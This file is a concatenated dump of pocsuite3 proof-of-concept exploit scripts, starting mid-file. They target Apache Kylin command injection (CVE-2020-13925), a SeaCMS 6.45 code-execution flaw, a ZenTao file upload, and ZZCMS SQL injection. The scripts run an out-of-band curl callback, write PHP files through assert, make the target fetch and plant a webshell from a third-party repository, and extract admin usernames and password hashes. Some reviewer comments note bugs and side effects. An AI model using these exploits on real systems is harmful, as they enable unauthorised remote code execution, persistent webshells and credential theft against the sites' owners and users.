        return self.parse_output(result)

    def _attack(self) -> Output:
        """Same as ``_verify``; no separate attack mode."""
        return self._verify()

    def _shell(self) -> Output:
        """Same as ``_verify``; no shell mode."""
        return self._verify()

    def parse_output(self, result: dict) -> Output:
        """Turn ``result`` into an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
109 |
110 |
111 | register_poc(DemoPOC)
112 |
--------------------------------------------------------------------------------
/命令注入-Java/Apache_Kylin_CVE_2020_13925_rce.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/3/13 10:15
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : Apache_Kylin_CVE_2020_13925.py
7 | # explain : 文件说明
8 | """
9 | If you have issues about development, please read:
10 | https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
11 | for more about information, plz visit http://pocsuite.org
12 | """
13 |
14 | import re
15 | from collections import OrderedDict
16 | from urllib.parse import urljoin
17 | from base64 import b64encode
18 | from pocsuite3.api import CEye
19 | from requests.cookies import RequestsCookieJar
20 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
21 | from pocsuite3.lib.utils import random_str
22 | from pocsuite3.lib.core.interpreter_option import OptString
23 |
class DemoPOC(POCBase):
    """pocsuite3 POC for CVE-2020-13925 (Apache Kylin authenticated command injection).

    ``login`` authenticates with HTTP Basic credentials and returns the
    session cookie; ``_verify`` requests the diag download endpoint with a
    project name carrying a ``curl`` to a CEye subdomain and decides via
    the out-of-band callback. ``_attack``/``_shell`` delegate to ``_verify``.
    """
    vulID = 'xxx'  # ssvid
    version = '3.0'
    author = ['seebug']
    vulDate = '2021-03-13'
    createDate = '2021-03-13'
    updateDate = '2021-03-13'
    references = ['http://code2sec.com/cve-2020-13925-apache-kylinming-ling-zhu-ru-lou-dong.html']
    name = 'CVE-2020-13925 Apache Kylin命令注入漏洞'
    appPowerLink = ''
    appName = 'Apache Kylin'
    appVersion = '< 3.0.3'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
CVE-2020-13925 Apache Kylin命令注入漏洞
'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE
    # CEye authentication token.
    # NOTE(review): placeholder credential in source; take it from an
    # option or the environment instead of committing it.
    token = "xxxxxxxxxxxxxx"

    def _options(self) -> OrderedDict:
        """Declare the required ``username``/``password`` options."""
        o = OrderedDict()
        o["username"] = OptString('', description='这个poc需要用户登录,请输入登录账号', require=True)
        o["password"] = OptString('', description='这个poc需要用户密码,请输入用户密码', require=True)
        return o

    def login(self) -> str:
        """Authenticate with HTTP Basic and return ``"JSESSIONID=<value>"``.

        NOTE(review): ``cookie`` is assigned only in the 200 branch; on 401,
        any other status, or an exception, ``return cookie`` raises
        ``UnboundLocalError``. Also the two ``if`` statements are
        independent, so a 401 logs both "账号或密码错误" and the generic
        failure message from the ``else`` branch.
        """
        login_url = urljoin(self.url, '/kylin/api/user/authentication')
        # Basic credentials are base64 of "user:password".
        login_data = b64encode((self.get_option("username") + ":" + self.get_option("password")).encode("utf-8"))
        headers = {"Authorization": "Basic %s" % login_data.decode('utf-8')}
        post_data = {}
        try:
            resp = requests.post(login_url, data=post_data, headers=headers)
            if resp.status_code == 401:
                logger.info("账号或密码错误")
            if resp.status_code == 200:
                cookies = requests.utils.dict_from_cookiejar(resp.cookies)
                cookie = "JSESSIONID="+cookies["JSESSIONID"]
                logger.info("获得的Cookie为:%s" % cookie)  # logs the session cookie in clear
                logger.info("Apache_Kylin登录成功")
            else:
                logger.info("Apache_Kylin登录失败,响应状态码为 %s " % str(resp.status_code))
        except Exception as e:
            logger.warn(str(e))  # deprecated alias of logger.warning
            logger.warn("Apache_Kylin登录失败")
        return cookie

    def _verify(self) -> Output:
        """Log in, hit the diag download endpoint and check CEye.

        Returns:
            Output: success with ``URL``/``Payload`` when CEye recorded the
            random marker, otherwise a failure output.
        """
        result = {}
        cookies = self.login()  # raw "JSESSIONID=..." header string
        CEye_main = CEye(token=self.token)
        ceye_subdomain = CEye_main.getsubdomain()
        random_uri = random_str(16)
        logger.info("random_url为:%s" % random_uri)
        # The marker is embedded as a subdomain so the callback is a DNS/HTTP
        # lookup of "<marker>.<ceye subdomain>".
        verify_payload = "curl%20" + random_uri + "." + str(ceye_subdomain)
        # %7c%7c is "||" URL-encoded, placed around the payload in the project segment.
        veri_url = urljoin(self.url, '/kylin/api/diag/project/%7c%7c'+verify_payload+'%7c%7c/download')
        headers = {
            "Content-Type": "text/xml;charset=UTF-8",
            "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
            "Cookie": cookies
        }
        logger.info("Headres如下:")
        logger.info(headers)  # logs the session cookie in clear
        try:
            # ``resp`` is unused; the verdict is the out-of-band callback only.
            resp = requests.get(veri_url,headers=headers)
            if CEye_main.verify_request(random_uri):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = veri_url
                result['VerifyInfo']['Payload'] = verify_payload
        except Exception as e:
            logger.warn(str(e))
        return self.parse_output(result)

    def _attack(self) -> Output:
        """Same as ``_verify``; no separate attack mode."""
        return self._verify()

    def _shell(self) -> Output:
        """Same as ``_verify``; no shell mode."""
        return self._verify()

    def parse_output(self, result: dict) -> Output:
        """Turn ``result`` into an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
111 |
112 |
113 | register_poc(DemoPOC)
114 |
--------------------------------------------------------------------------------
/命令注入-php/seacms_6_45_rce.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/3/13 10:15
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : seacms_6_45_rce.py
7 | # explain : 文件说明
8 | """
9 | If you have issues about development, please read:
10 | https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
11 | for more about information, plz visit http://pocsuite.org
12 | """
13 |
14 | import re
15 | import time
16 | from collections import OrderedDict
17 | from urllib.parse import urljoin
18 | from base64 import b64encode
19 | from pocsuite3.api import CEye
20 | from requests.cookies import RequestsCookieJar
21 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
22 | from pocsuite3.lib.utils import get_middle_text,random_str
23 | from pocsuite3.lib.core.interpreter_option import OptString
24 |
class DemoPOC(POCBase):
    """pocsuite3 POC for the SeaCMS 6.45 ``search.php`` template-injection RCE.

    ``_verify`` injects ``phpinfo()`` via the ``order`` parameter and looks
    for ``allow_url_include`` in the response. ``_attack`` injects a
    ``$_POST[func]($_POST[cmd])`` call that writes ``<random>.php`` into the
    web root, then fetches that file to confirm. ``_shell`` delegates to
    ``_attack``.
    """
    vulID = 'xxx'  # ssvid
    version = '3.0'
    author = ['seebug']
    vulDate = '2021-03-13'
    createDate = '2021-03-13'
    updateDate = '2021-03-13'
    references = ['https://github.com/jiangsir404/PHP-code-audit/blob/master/seacms/seacms%20%E5%A4%9A%E4%B8%AA%E7%89%88%E6%9C%AC%E7%9A%84%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93(search.php).md']
    name = 'seacms 6.45 代码执行漏洞'
    appPowerLink = ''
    appName = 'seacms'
    appVersion = '< 6.45'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
seacms 6.45 代码执行漏洞
'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _options(self) -> OrderedDict:
        """Declare ``username`` and ``command``.

        NOTE(review): neither option is read anywhere in this class —
        ``_verify`` and ``_attack`` use fixed payloads — so both are dead
        options that mislead the operator.
        """
        o = OrderedDict()
        o["username"] = OptString('', description='这个poc需要用户登录,请输入登录账号', require=False)
        o["command"] = OptString('', description='将要执行的系统命令', require=False)
        return o

    def _verify(self) -> Output:
        """POST the ``phpinfo()`` probe and look for ``allow_url_include``.

        Returns:
            Output: success with ``URL``/``Payload`` when the flag text is in
            the response, otherwise a failure output.
        """
        result = {}
        phpcode = "phpinfo()"
        # A string that only a rendered phpinfo() page would contain.
        flagText = "allow_url_include"
        # Sent as a raw x-www-form-urlencoded body string (not a dict).
        verify_payload = "searchword=1&searchtype=5&order=}{end if}{if:1)" + phpcode + ";if(1}{end if}"
        veri_url = urljoin(self.url, '/search.php')
        headers = {
            "Content-Type": "application/x-www-form-urlencoded;charset=utf-8",
            "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        }
        try:
            resp = requests.post(veri_url,data=verify_payload,headers=headers)  # no timeout
            if flagText in resp.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = veri_url
                result['VerifyInfo']['Payload'] = verify_payload
        except Exception as e:
            logger.warn(str(e))  # deprecated alias of logger.warning
        return self.parse_output(result)

    def _attack(self) -> Output:
        """Write ``<random>.php`` on the target and confirm by fetching it.

        Returns:
            Output: success with ``URL``/``Payload``/``Shell_url``/
            ``Shell_pass`` when the fetched file contains the random string,
            otherwise a failure output.

        NOTE(review): the file written here contains only ``random_string``
        and nothing in this class removes it afterwards — it stays in the
        target's web root as a persistent artefact. The reported
        ``Shell_pass`` "sma11stu" does not correspond to anything this code
        writes.
        """
        result = {}
        random_string = random_str(16)
        verify_payload = "searchword=1&searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);if(1}{end if}&cmd=fwrite(fopen('" + random_string + ".php','w'),'" + random_string + "')&func=assert"
        veri_url = urljoin(self.url, '/search.php')
        shell_url = urljoin(self.url, '/' + random_string + '.php')
        headers = {
            "Content-Type": "application/x-www-form-urlencoded;charset=utf-8",
            "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        }
        try:
            resp = requests.post(veri_url,data=verify_payload,headers=headers)  # response unused
            # Brief pause before checking that the written file is served.
            time.sleep(1)
            resp_1 = requests.get(shell_url,headers=headers)
            if (random_string in resp_1.text) and resp_1.status_code == 200:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = veri_url
                result['VerifyInfo']['Payload'] = verify_payload
                # Same value as ``shell_url`` above.
                result['VerifyInfo']['Shell_url'] = urljoin(self.url, '/' + random_string + '.php')
                result['VerifyInfo']['Shell_pass'] = "sma11stu"
        except Exception as e:
            logger.warn(str(e))
        return self.parse_output(result)

    def _shell(self) -> Output:
        """No shell mode; delegates to ``_attack``."""
        return self._attack()

    def parse_output(self, result: dict) -> Output:
        """Turn ``result`` into an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
105 |
106 |
107 | register_poc(DemoPOC)
108 |
--------------------------------------------------------------------------------
/文件上传漏洞-Java/zantaopms_CNVD_C_2020_121325_upload.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/5/12 22:41
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : zantaopms_CNVD_C_2020_121325_upload.py
7 | # explain : 文件说明
8 | import base64
9 | from collections import OrderedDict
10 | from pocsuite3.lib.core.interpreter_option import OptString
11 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
12 | from pocsuite3.lib.utils import random_str
13 |
14 |
15 | class DemoPOC(POCBase):
16 | vulID = 'xxx' # ssvid
17 | version = '3.0'
18 | author = ['seebug']
19 | vulDate = '2021-05-12'
20 | createDate = '2021-05-12'
21 | updateDate = '2021-05-12'
22 | references = ['https://paper.seebug.org/705/']
23 | name = 'CNVD-C-2020-121325 禅道后台文件上传漏洞'
24 | appPowerLink = ''
25 | appName = 'zantaopms'
26 | appVersion = '<= 12.4.2'
27 | vulType = VUL_TYPE.UPLOAD_FILES
28 | desc = '''
29 | CNVD-C-2020-121325 禅道后台文件上传漏洞
30 | '''
31 | samples = []
32 | install_requires = ['']
33 | category = POC_CATEGORY.EXPLOITS.REMOTE
34 |
def _options(self) -> OrderedDict:
    """Declare the single required ``zentaosid`` option (a valid session id)."""
    declared = [
        ("zentaosid", OptString('', description='这个poc需要zentaosid', require=True)),
    ]
    return OrderedDict(declared)
39 |
40 | def _verify(self):
41 | result = {}
42 | random_uri = random_str(16)
43 | try:
44 | verify_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_verify.txt'
45 | base64_payload = base64.b64encode(verify_payload.encode())
46 | verify_content = base64_payload.decode()
47 | verify_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + verify_content
48 | logger.info(verify_url)
49 | cookies = {
50 | "zentaosid": self.get_option("zentaosid")
51 | }
52 | down_res = requests.get(verify_url,cookies=cookies)
53 | verify_info_url = self.url + '/data/client/'+random_uri+'/php_verify.txt'
54 | verify_res = requests.get(verify_info_url,cookies=cookies)
55 | if verify_res.status_code ==200 and "md5('3.1416');" in verify_res.content.decode() :
56 | result['VerifyInfo'] = {}
57 | result['VerifyInfo']['URL'] = verify_info_url
58 | result['VerifyInfo']['Payload'] = verify_payload
59 | except Exception as e:
60 | logger.warn(str(e))
61 | return self.parse_output(result)
62 |
63 | def _attack(self):
64 | result = {}
65 | random_uri = random_str(16)
66 | try:
67 | attack_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_attack.php'
68 | base64_payload = base64.b64encode(attack_payload.encode())
69 | attack_content = base64_payload.decode()
70 | attack_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + attack_content
71 | logger.info(attack_url)
72 | cookies = {
73 | "zentaosid": self.get_option("zentaosid")
74 | }
75 | down_res = requests.get(attack_url,cookies=cookies)
76 | attack_info_url = self.url + '/data/client/'+random_uri+'/php_attack.php'
77 | attack_res = requests.get(attack_info_url,cookies=cookies)
78 | if attack_res.status_code ==200 and "d4d7a6b8b3ed8ed86db2ef2cd728d8ec" in attack_res.content.decode() :
79 | result['VerifyInfo'] = {}
80 | result['VerifyInfo']['URL'] = attack_info_url
81 | result['VerifyInfo']['Payload'] = attack_payload
82 | except Exception as e:
83 | logger.warn(str(e))
84 | return self.parse_output(result)
85 |
86 | def _shell(self):
87 | result = {}
88 | random_uri = random_str(16)
89 | try:
90 | shell_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_shell.php'
91 | base64_payload = base64.b64encode(shell_payload.encode())
92 | shell_content = base64_payload.decode()
93 | shell_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + shell_content
94 | print(shell_url)
95 | cookies = {
96 | "zentaosid": self.get_option("zentaosid")
97 | }
98 | down_res = requests.get(shell_url,cookies=cookies)
99 | shell_info_url = self.url + '/data/client/'+random_uri+'/php_shell.php'
100 | logger.info("webshell地址:" + shell_info_url)
101 | shell_res = requests.get(shell_info_url,cookies=cookies)
102 | except Exception as e:
103 | logger.warn(str(e))
104 | return self.parse_output(result)
105 |
106 | def parse_output(self, result):
107 | output = Output(self)
108 | if result:
109 | output.success(result)
110 | else:
111 | output.fail('target is not vulnerable')
112 | return output
113 |
114 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/文件上传漏洞-Php/zantaopms_CNVD_C_2020_121325_upload.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/5/12 22:41
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : zantaopms_CNVD_C_2020_121325_upload.py
7 | # explain : 文件说明
8 | import base64
9 | from collections import OrderedDict
10 | from pocsuite3.lib.core.interpreter_option import OptString
11 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
12 | from pocsuite3.lib.utils import random_str
13 |
14 |
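class DemoPOC(POCBase):
    """pocsuite3 POC for CNVD-C-2020-121325: ZenTao (禅道) <= 12.4.2 back-end file upload.

    All three modes drive the same primitive (see ``_deploy``):

    1. ``GET /index.php?m=client&f=download&version=<rand>&link=<base64 url>``
       with a valid back-end ``zentaosid`` cookie makes the *server* fetch the
       URL and store the file under ``/data/client/<rand>/<basename>``.
    2. The stored file is requested back and its body is checked for a marker
       (``_verify`` / ``_attack``); ``_shell`` reports where the shell landed.

    Supply-chain caveat: the files the target is told to fetch live in a
    third-party GitHub repository (``DEFAULT_PAYLOAD_BASE``).  Whatever that
    repository serves at run time is what gets written into the target's web
    root, and the password of ``php_shell.php`` is whatever its author chose.
    Point the ``payload_base`` option at a copy you control before using this
    outside a lab.  Nothing is cleaned up afterwards: remove
    ``/data/client/<rand>/`` on the target once the test is done.

    NOTE(review): ``references`` points at paper.seebug.org/705, which is a
    JavaMelody XXE write-up rather than a ZenTao analysis; it looks copied
    from a sibling POC — confirm before citing it.
    """
    vulID = 'xxx'  # ssvid
    version = '3.0'
    author = ['seebug']
    vulDate = '2021-05-12'
    createDate = '2021-05-12'
    updateDate = '2021-05-12'
    references = ['https://paper.seebug.org/705/']
    name = 'CNVD-C-2020-121325 禅道后台文件上传漏洞'
    appPowerLink = ''
    appName = 'zantaopms'  # sic (product is ZenTao / zentaopms); kept so existing tooling keyed on it still matches
    appVersion = '<= 12.4.2'
    vulType = VUL_TYPE.UPLOAD_FILES
    desc = '''
    CNVD-C-2020-121325 禅道后台文件上传漏洞
    '''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE

    # Default location of php_verify.txt / php_attack.php / php_shell.php.
    # The upper-case scheme is kept verbatim from the original payload; it is
    # presumably what gets the link past ZenTao's scheme check — do not
    # normalise it without re-testing.
    DEFAULT_PAYLOAD_BASE = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main'
    # Substring php_verify.txt is expected to contain when served back as-is.
    VERIFY_MARKER = "md5('3.1416');"
    # Substring php_attack.php is expected to print once PHP has executed it.
    ATTACK_MARKER = "d4d7a6b8b3ed8ed86db2ef2cd728d8ec"
    # Per-request timeout (seconds) so an unresponsive target cannot hang a scan.
    TIMEOUT = 10

    def _options(self):
        """Declare the POC options: the session cookie and, optionally, where payloads are fetched from."""
        o = OrderedDict()
        o["zentaosid"] = OptString('', description='这个poc需要zentaosid', require=True)
        o["payload_base"] = OptString(
            self.DEFAULT_PAYLOAD_BASE,
            description='Base URL the target fetches php_verify.txt / php_attack.php / php_shell.php from; host your own copy',
            require=False,
        )
        return o

    def _cookies(self):
        """Cookie jar carrying the back-end session ZenTao authorises the download with."""
        return {"zentaosid": self.get_option("zentaosid")}

    def _deploy(self, filename):
        """Make the target fetch ``filename`` from ``payload_base`` and read it back.

        Returns ``(source_url, stored_url, response)`` where ``response`` is the
        GET of the stored copy.  Network errors propagate to the caller.
        """
        random_uri = random_str(16)
        base = self.get_option("payload_base") or self.DEFAULT_PAYLOAD_BASE
        source_url = base.rstrip('/') + '/' + filename
        # ZenTao reads the link base64-encoded from the query string.
        link = base64.b64encode(source_url.encode()).decode()
        target = self.url.rstrip('/')
        download_url = target + '/index.php?m=client&f=download&version=' + random_uri + '&link=' + link
        logger.info(download_url)
        cookies = self._cookies()
        down_res = requests.get(download_url, cookies=cookies, timeout=self.TIMEOUT)
        logger.debug('download request returned HTTP %s', down_res.status_code)
        # The server stores the fetched file in a directory named after ``version``.
        stored_url = target + '/data/client/' + random_uri + '/' + filename
        stored_res = requests.get(stored_url, cookies=cookies, timeout=self.TIMEOUT)
        return source_url, stored_url, stored_res

    @staticmethod
    def _served(resp, marker):
        """True when ``resp`` is HTTP 200 and its body contains ``marker`` (lenient decode; markers are ASCII)."""
        return resp.status_code == 200 and marker in resp.content.decode('utf-8', 'replace')

    def _verify(self):
        """Drop a harmless text file and confirm it is served back from the web root."""
        result = {}
        try:
            source_url, stored_url, resp = self._deploy('php_verify.txt')
            if self._served(resp, self.VERIFY_MARKER):
                result['VerifyInfo'] = {'URL': stored_url, 'Payload': source_url}
        except Exception as e:
            logger.warning(str(e))
        return self.parse_output(result)

    def _attack(self):
        """Drop a PHP probe and confirm the server executed it (marker appears in the output)."""
        result = {}
        try:
            source_url, stored_url, resp = self._deploy('php_attack.php')
            if self._served(resp, self.ATTACK_MARKER):
                result['VerifyInfo'] = {'URL': stored_url, 'Payload': source_url}
        except Exception as e:
            logger.warning(str(e))
        return self.parse_output(result)

    def _shell(self):
        """Drop the webshell and report its URL.

        The original version never filled ``result`` and so always reported
        'target is not vulnerable' even after the shell was written; a 200 on
        the stored URL is now reported as success.  Note that a 200 alone does
        not prove PHP executed the file (no marker is checked here).
        """
        result = {}
        try:
            source_url, stored_url, resp = self._deploy('php_shell.php')
            logger.info("webshell地址:" + stored_url)
            if resp.status_code == 200:
                result['VerifyInfo'] = {'URL': stored_url, 'Payload': source_url, 'Shell_url': stored_url}
        except Exception as e:
            logger.warning(str(e))
        return self.parse_output(result)

    def parse_output(self, result):
        """Turn a result dict into a pocsuite3 ``Output``: non-empty means success."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output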
113 |
114 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/SQL注入-Php/zzcms_8_3_sql.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/3/21 11:22
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : zzcms_8_3_sql.py
7 | # explain : 文件说明
8 |
9 | import re
10 | import json
11 | from collections import OrderedDict
12 | from urllib.parse import urljoin
13 | from requests.cookies import RequestsCookieJar
14 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
15 | from pocsuite3.lib.utils import random_str
16 | from pocsuite3.lib.core.interpreter_option import OptString
17 | from pocsuite3.lib.core.common import get_md5
18 |
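class DemoPOC(POCBase):
    """pocsuite3 POC for CVE-2018-14961: ZZCMS <= 8.3 front-end SQL injection.

    ``/dl/dl_sendmail.php`` takes a raw ``sql`` POST field and reflects the
    query result, so a ``UNION SELECT`` can read ``zzcms_admin``.  The request
    needs a logged-in front-end user, which ZZCMS carries in the ``UserName``
    / ``PassWord`` cookies (the latter the md5 of the password, see
    ``cookie``).  ``add_msg`` is issued first and treats the session as valid
    only when the reply is HTTP 200 and does not contain ``/user/login.php``.

    Side effects on the target: every mode first posts a random 16-character
    message through ``/user/msg.php`` (``add_msg``) and nothing removes it.
    ``_attack`` reports the first ``zzcms_admin`` row's ``admin`` and ``pass``
    columns verbatim — treat the output as credential material.
    """
    vulID = 'xxx'  # ssvid
    version = '3.0'
    author = ['seebug']
    vulDate = '2021-03-21'
    createDate = '2021-03-21'
    updateDate = '2021-03-21'
    references = ['http://keac.club/2020/02/02/CVE-2018-14961/']
    name = 'ZZCMS <=8.3 前台SQL 注入 CVE-2018-14961'
    appPowerLink = ''
    appName = 'ZZCMS'
    appVersion = '<= 8.3'
    vulType = VUL_TYPE.SQL_INJECTION
    desc = '''
    ZZCMS <=8.3 前台SQL 注入 CVE-2018-14961
    '''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    }

    # Per-request timeout (seconds) so an unresponsive target cannot hang a scan.
    TIMEOUT = 10
    # The injectable endpoint; the whole query goes in the ``sql`` POST field.
    INJECT_PATH = '/dl/dl_sendmail.php'
    # ``_attack`` wraps ``admin,pass`` between literal ``flag`` markers; the
    # non-greedy match takes the first reflected row only.
    _CRED_RE = re.compile(r'flag,(.*?),flag')

    def _options(self):
        """Declare the front-end credentials the injection request must carry."""
        o = OrderedDict()
        o["username"] = OptString('', description='这个poc需要用户登录,请输入登录账号', require=True)
        o["password"] = OptString('', description='这个poc需要用户密码,请输入用户密码', require=True)
        return o

    def cookie(self):
        """Auth cookies ZZCMS checks: the plain user name plus the md5 of the password."""
        return {
            "UserName": self.get_option("username"),
            "PassWord": get_md5(self.get_option("password")),
        }

    def add_msg(self):
        """Post a throw-away message as the user to confirm the credentials are accepted.

        Returns True when the reply is HTTP 200 and does not contain the login
        page path, False otherwise; a failed request is logged and yields False.
        """
        msg_url = urljoin(self.url, '/user/msg.php?action=savedata&saveas=add')
        post_data = {
            "info_content": random_str(16),
            # Sent exactly as the original POC does (already percent-encoded,
            # so requests encodes the '%' signs again); left untouched.
            "Submit": "%E6%8F%90%E4%BA%A4",
        }
        try:
            resp = requests.post(msg_url, data=post_data, cookies=self.cookie(),
                                 headers=self.headers, timeout=self.TIMEOUT)
        except Exception as e:
            logger.warning(str(e))
            logger.warning("zzcms系统登录失败")
            return False
        if resp.status_code == 200 and "/user/login.php" not in resp.text:
            logger.info("zzcms系统登录成功")
            return True
        logger.info("zzcms系统登录失败,响应状态码为:%s" % resp.status_code)
        return False

    def _inject(self, payload):
        """POST ``payload`` as the ``sql`` field to the injectable endpoint; returns ``(url, response)``."""
        veri_url = urljoin(self.url, self.INJECT_PATH)
        resp = requests.post(veri_url, data={"sql": payload}, cookies=self.cookie(),
                             headers=self.headers, timeout=self.TIMEOUT)
        return veri_url, resp

    @classmethod
    def _parse_credentials(cls, text):
        """Extract ``(admin, pass)`` from the first ``flag,<admin>,<pass>,flag`` in ``text``, or None.

        Splits from the right so a comma inside the user name cannot shift the
        password column; a missing match no longer raises (the original
        indexed a None search result).
        """
        m = cls._CRED_RE.search(text)
        if m is None:
            return None
        admin, _, password = m.group(1).rpartition(',')
        return admin, password

    def _verify(self):
        """Inject a random token and check that the page reflects it."""
        result = {}
        if not self.add_msg():
            return self.parse_output(result)
        random_uri = random_str(16)
        logger.info("random_uri为:%s" % random_uri)
        # 0x7e is '~': the token is wrapped in tildes so a stray occurrence of
        # the bare token elsewhere in the page cannot produce a false positive.
        verify_payload = ("select email from zzcms_dl where id=-1 union select concat(0x7e,'"
                          + random_uri + "',0x7e) from zzcms_admin #")
        try:
            veri_url, resp = self._inject(verify_payload)
            if resp.status_code == 200 and "~" + random_uri + "~" in resp.text:
                result['VerifyInfo'] = {'URL': veri_url, 'Payload': verify_payload}
        except Exception as e:
            logger.warning(str(e))
        return self.parse_output(result)

    def _attack(self):
        """Read the first ``zzcms_admin`` row (``admin``, ``pass``) through the injection."""
        result = {}
        if not self.add_msg():
            return self.parse_output(result)
        attack_payload = ("select email from zzcms_dl where id=-1 union select "
                          "concat('flag,',admin,',',pass,',flag') from zzcms_admin #")
        try:
            veri_url, resp = self._inject(attack_payload)
            creds = self._parse_credentials(resp.text) if resp.status_code == 200 else None
            if creds is not None:
                admin_username, admin_password = creds
                result['VerifyInfo'] = {
                    'URL': veri_url,
                    'Payload': attack_payload,
                    'admin_username': admin_username,
                    'admin_password': admin_password,
                }
        except Exception as e:
            logger.warning(str(e))
        return self.parse_output(result)

    def _shell(self):
        """Shell mode is identical to attack mode for this POC: delegate."""
        return self._attack()

    def parse_output(self, result):
        """Turn a result dict into a pocsuite3 ``Output``: non-empty means success."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output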
129 |
130 | register_poc(DemoPOC)
131 |
--------------------------------------------------------------------------------